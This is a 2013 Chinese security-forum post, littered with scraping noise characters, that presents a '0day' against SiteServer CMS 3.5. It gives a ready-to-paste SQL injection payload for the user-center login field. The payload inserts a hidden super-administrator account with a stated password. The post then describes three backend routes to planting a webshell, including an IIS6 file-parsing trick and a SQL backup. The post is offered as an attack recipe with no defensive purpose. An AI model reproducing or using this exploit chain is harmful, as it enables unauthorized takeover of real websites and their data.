找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2141|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版+ E; v0 G6 l" y

. Y4 _# k* K. @' {; Ustieserver官网:www.siteserver.cn3 m* o/ V9 p3 a# @# ?
9 m' s3 R% ^3 m% @. d2 `  L0 b: ?: x

. Q. q  X3 r+ o( ?/ Z9 k/ ^: m% X% d
EXP:3 D6 H' k! t# z* V: f) T
* p+ t; C; x3 [/ c+ N# M4 @* {7 g
直接访问UserCenter/login.aspx
" x9 d7 @7 W& I9 i
- X' D# t5 q. ^# u6 I
  y# W. Y% ^$ |" Q. S0 l- f# r; F0 a/ J7 v! ~
用户名处输入:- a5 o' h! c7 `8 X8 k) E
6 p4 Y' g3 U9 v2 S( P  C& M/ d
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
" Z6 |6 Z- `* w! y+ T# C! C; q2 b; ^: Q7 ]6 @& x# J

$ v) D; V/ W" \2 \" V# _8 n; p6 d/ W8 G+ y; p# d  v& [' l9 [
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。& ]! e2 K( r4 a; m9 O. B# x

& B) f6 O8 ]' ~7 I1 \7 W$ i # r6 I6 ?) Z3 c3 _+ P5 A  d
8 I$ h  [) F6 Z& g  c
之后再访问后台SiteServer/login.aspx用插入的用户登陆  |1 N1 J+ s, Q2 p, c% @
7 @, n6 K  s: v/ Q* W  h
6 H0 h, C. Q( ?+ V" [' U* b
0 h' j1 T. b( T- ^5 O# D8 ?4 d
后台拿webshell的三种方法:
2 a" {  x6 B& G; [- c  }$ f) H: I5 _$ a5 d
一、: ^% Q+ G7 w7 ~0 v4 Z( l

% e& }2 V/ f% A! Y8 L1 x3 M6 J9 u站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
  `! {! N& ~! }" D0 F. r. v  A. z  Y9 A
二、
5 _3 l7 ^$ q, K! m
8 A: X, W& o; _+ c5 t) O1 Z+ v' Y8 d, A成员权限-》添加用户-》用户名为:1.asp
/ ]+ K( m) w, W" Q! @& y- @* g, r2 E+ H5 Z) o6 w2 D
http://127.0.0.1/usercenter/
1 h6 ?- c9 p( I
$ ~. B2 `) p9 y9 `, O用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
  x$ j! p$ k2 i3 S. s+ P. X4 l! P* T, G6 s* X
(ps:后台添加用户时不会验证是否含有非法字符)+ u4 G7 n, m* |& u
/ U' s' y7 ^$ h+ P- J5 g  ~( u( n
三、
1 D2 _' V* k: I6 E$ n9 N- m& A1 A/ h+ c# }9 s; ^
系统工具-》实用工具-》机器参数查看
7 i6 L" V" e6 B; C可以看到数据库类型、名称,WEB路径
' m0 @; @% I7 T8 t# X0 S- _) U0 L4 |4 s* `# Q& S1 e" k: x5 \* M: M" U
系统工具-》数据库工具-》SQL语句查询
8 L# i) h6 j/ C这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
7 Z$ c' B/ E" ]! }1 A( m8 o! m" ~2 p0 b) Z5 {
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表